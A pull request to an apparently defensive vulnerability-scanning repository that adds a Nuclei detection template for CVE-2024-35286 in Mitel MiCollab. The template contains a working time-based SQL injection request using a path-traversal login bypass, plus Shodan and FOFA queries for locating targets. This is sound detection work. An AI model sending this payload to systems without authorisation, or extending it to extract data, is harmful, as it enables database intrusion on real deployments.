### PR TITLE
Add Detection for CVE-2024-35286

### DIFF
--- a/README.md
+++ b/README.md
@@ -163,6 +163,7 @@ For the moment, we are currently focused on the CISA KEV Database and Google Tsu
 | CVE-2024-50498                                          |      ✅      | Official Nuclei template.                               |   2024-10-28   |
 | Cyberpanel-rce                                          |      ✅      | Official Nuclei template.                               |   2024-10-27   |
 | CVE-2024-41713                                          |      ✅      | Official Nuclei template.                               |   2024-10-21   |
+| CVE-2024-35286                                          |      ✅      | Official Nuclei template.                               |   2024-10-21   |
 | CVE-2024-9634                                           |      ✅      | Custom Exploit by Ostorlab: included in Agent Asteroid. |   2024-10-15   |
 | JETPACK_DATA_EXPOSURE                                   |      ✅      | Custom Exploit by Ostorlab: included in Agent Asteroid. |   2024-10-15   |
 | CVE-2024-9164                                           |      ✅      | Custom Exploit by Ostorlab: included in Agent Asteroid. |   2024-10-11   |

--- a/agent_group.yaml
+++ b/agent_group.yaml
@@ -302,6 +302,7 @@ agents:
             - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2024-46938.yaml
             - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2024-50498.yaml
             - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2024-41713.yaml
+            - https://raw.githubusercontent.com/Ostorlab/known_exploited_vulnerbilities_detectors/main/nuclei/CVE-2024-35286.yaml
       - name: use_default_templates
         type: boolean
         description: use nuclei's default templates to scan.

--- a/nuclei/CVE-2024-35286.yaml
+++ b/nuclei/CVE-2024-35286.yaml
@@ -1,0 +1,45 @@
+id: CVE-2024-35286
+
+info:
+  name: MiCollab MiCollab - SQL Injection
+  author: DhiyaneshDK,watchTowr
+  severity: critical
+  description: |
+    A vulnerability in NuPoint Messenger (NPM) of Mitel MiCollab through 9.8.0.33 allows an unauthenticated attacker to conduct a SQL injection attack due to insufficient sanitization of user input. A successful exploit could allow an attacker to access sensitive information and execute arbitrary database and management operations.
+  reference:
+    - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-24-0014
+    - https://github.com/watchtowrlabs/Mitel-MiCollab-Auth-Bypass_CVE-2024-41713
+    - https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-35286
+    cwe-id: CWE-89
+    epss-score: 0.00043
+    epss-percentile: 0.10436
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: mitel
+    product: cmg_suite
+    shodan-query: http.html:"Mitel Networks"
+    fofa-query: body="mitel networks"
+  tags: cve,cve2024,mitel,cmg-suite,sqli,time-based-sqli
+
+variables:
+  random_string: "{{to_lower(rand_text_alpha(5))}}"
+
+http:
+  - raw:
+      - |
+        POST /npm-pwg/..;/npm-admin/login.do HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        subAction=basicLogin&username={{random_string}}'||pg_sleep(7)--&password={{random_string}}&clusterIndex=0
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - duration > 7


### PR DESCRIPTION
Couldn't find vulnerable targets online, but the template was inspired from the research done by [Watchtowr](https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/). And Mitel MiCollab has approved their findings.